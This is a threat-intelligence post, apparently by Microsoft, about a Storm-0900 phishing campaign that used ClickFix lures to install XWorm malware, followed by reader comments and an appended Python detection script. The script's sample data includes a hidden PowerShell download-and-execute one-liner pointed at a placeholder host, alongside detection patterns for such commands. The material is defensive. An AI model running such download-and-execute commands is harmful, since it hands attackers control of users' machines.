Post about Phishing Campaign pushing XWorm

www.linkedin.com · Microsoft Threat Intelligence · 4 months ago · news
Microsoft Threat Intelligence · 112,857 followers · 4mo

On Thanksgiving eve, November 26, Microsoft detected and blocked a high-volume phishing campaign from a threat actor we track as Storm-0900. The campaign used parking ticket and medical test result themes and referenced Thanksgiving to lend credibility and lower recipients’ suspicion. The campaign consisted of tens of thousands of emails and targeted primarily users in the United States. Microsoft disrupted this campaign through a combination of email filtering, endpoint protections, and threat intelligence-based preemptive blocking of attacker infrastructure. The URLs in the phishing emails redirected to an attacker-controlled landing page on the malicious domain permit-service[.]top that employed several rounds of user interaction. First, users needed to solve a slider CAPTCHA by clicking and dragging a slider, followed by ClickFix, a technique that threat actors use to trick users into running malicious commands on their devices. If users fell for the ClickFix lure and executed a command in their Run prompt, a PowerShell script would run.

Like similar Storm-0900 activity, this campaign led to XWorm, a popular modular malware used by many threat actors for remote access, deployment of other malware, and data theft. XWorm uses plugins that threat actors can use to perform various tasks on compromised devices. These plugins have evolved over the years. While we have not observed it being used in attacks, the latest XWorm version includes a plugin for encrypting files, giving the malware ransomware capability. Storm-0900 is a prolific threat actor that, when active, launches phishing campaigns every week. The actor abuses many popular brands in their emails. This specific campaign, along with the parking ticket and medical test result themed emails, also utilized emails purporting to be from a health care company and a government health agency. Microsoft recommends continuously raising awareness of phishing campaigns, including attack simulation training, among users. In addition to blocking the phishing emails through email filtering and preemptive blocking of infrastructure, Microsoft Defender detects the XWorm malware, malicious connections, and follow-on malicious behavior. This campaign underscores the importance of early detection and blocking of malicious activity in disrupting multi-stage attacks and stopping threat actors from performing follow-on actions.

271 reactions · 10 comments

Comments (10)

Adam Goss · 4mo
The shift to "ClickFix" techniques highlights a critical evolution in social engineering: attackers are no longer just asking for credentials; they are tricking users into bypassing their own security controls. The danger here is that many users believe "if I didn't type my password, I'm safe." They don't realize that pasting a script into the Run prompt is far more destructive than a compromised credential.

To combat this, security teams must update their phishing simulations to test for these "instructional" attacks, not just the standard "fake login page" scenarios. You need to train your people to recognize when they are being weaponized against their own machine.

Bryan Hodges · 4mo
Further evidence that phishing is not just email anymore. In the wild, you see it can be multi-stage social engineering backed by modular malware. Continuous user training is still one of the strongest controls we have, but it needs to be pushed beyond just phishing email simulations.

Breach Guardians · 4mo
This rapid detection and disruption of a massive Storm-0900 phishing wave is a powerful reminder of why layered defenses and ongoing user awareness are critical.

Roysten Ng · 4mo
Well-written writeup 👍

Gregory H. · 4mo
Any jobs available?

Luck Suknimit · 4mo
Thanks for sharing.

Patrick M. · 4mo
Thank you for sharing, peace!

Shanea Collins · 4mo
Thanks for sharing.
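The post describes the ClickFix step as a command pasted into the Windows Run prompt that launches PowerShell. As an added example that is not part of the original post and not Microsoft's own detection logic, the Python script below scores constructed process-creation records for the traits a defender would look for in that pattern: explorer.exe as the direct parent of PowerShell (the Run dialog is hosted by explorer), plus command-line traits that a console a user opens by hand rarely carries. The host names, command lines and the example.invalid URL are constructed sample data, and the indicator list is an illustrative starting point rather than a complete rule.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record, with the fields a Sysmon/EDR event carries."""
    host: str
    parent_image: str
    image: str
    command_line: str


POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line traits typical of a pasted one-liner; each match adds one reason.
# The regexes are illustrative and deliberately broad (constructed for this example).
CMDLINE_INDICATORS = [
    (re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I), "download cradle"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "inline expression execution"),
]


def score_event(ev: ProcEvent) -> list[str]:
    """Return the list of reasons an event looks like Run-prompt-launched PowerShell."""
    reasons: list[str] = []
    if ev.image.lower() not in POWERSHELL_IMAGES:
        return reasons
    # The Run prompt is hosted by explorer.exe, so PowerShell as a direct child of
    # explorer (no terminal or IDE in between) is the first hint of a pasted command.
    if ev.parent_image.lower() == "explorer.exe":
        reasons.append("powershell spawned directly by explorer.exe")
    for pattern, label in CMDLINE_INDICATORS:
        if pattern.search(ev.command_line):
            reasons.append(label)
    return reasons


def find_clickfix_candidates(events: list[ProcEvent], min_reasons: int = 2) -> list[tuple[ProcEvent, list[str]]]:
    """Return (event, reasons) pairs for events carrying at least `min_reasons` indicators.

    A threshold of two keeps a user who merely opens PowerShell from the shell
    (one indicator) out of the alert queue.
    """
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev, reasons))
    return hits


# Constructed sample telemetry for the example; none of this is real data.
SAMPLE_EVENTS = [
    # User opens PowerShell from the shell: explorer parent, clean command line.
    ProcEvent("WS-01", "explorer.exe", "powershell.exe", "powershell.exe"),
    # Scheduled task with an encoded command: worth review, but not the Run-prompt pattern.
    ProcEvent("SRV-02", "svchost.exe", "powershell.exe",
              "powershell.exe -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="),
    # ClickFix-style: explorer parent, hidden window, download-and-execute one-liner.
    ProcEvent("WS-07", "explorer.exe", "powershell.exe",
              'powershell -w hidden -c "iex (iwr http://example.invalid/x -UseBasicParsing)"'),
    # Unrelated: user launched cmd.exe from the Run prompt.
    ProcEvent("WS-03", "explorer.exe", "cmd.exe", "cmd.exe"),
]


if __name__ == "__main__":
    for ev, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{ev.host}: {ev.command_line}")
        for reason in reasons:
            print(f"   - {reason}")
```

Only the WS-07 record clears the threshold (four indicators); the administrator's console on WS-01 and the encoded scheduled task on SRV-02 each score one and stay below it. The same logic maps directly onto a Sysmon Event ID 1 or EDR process-creation query keyed on ParentImage and CommandLine, which is where a SOC would run it against real telemetry.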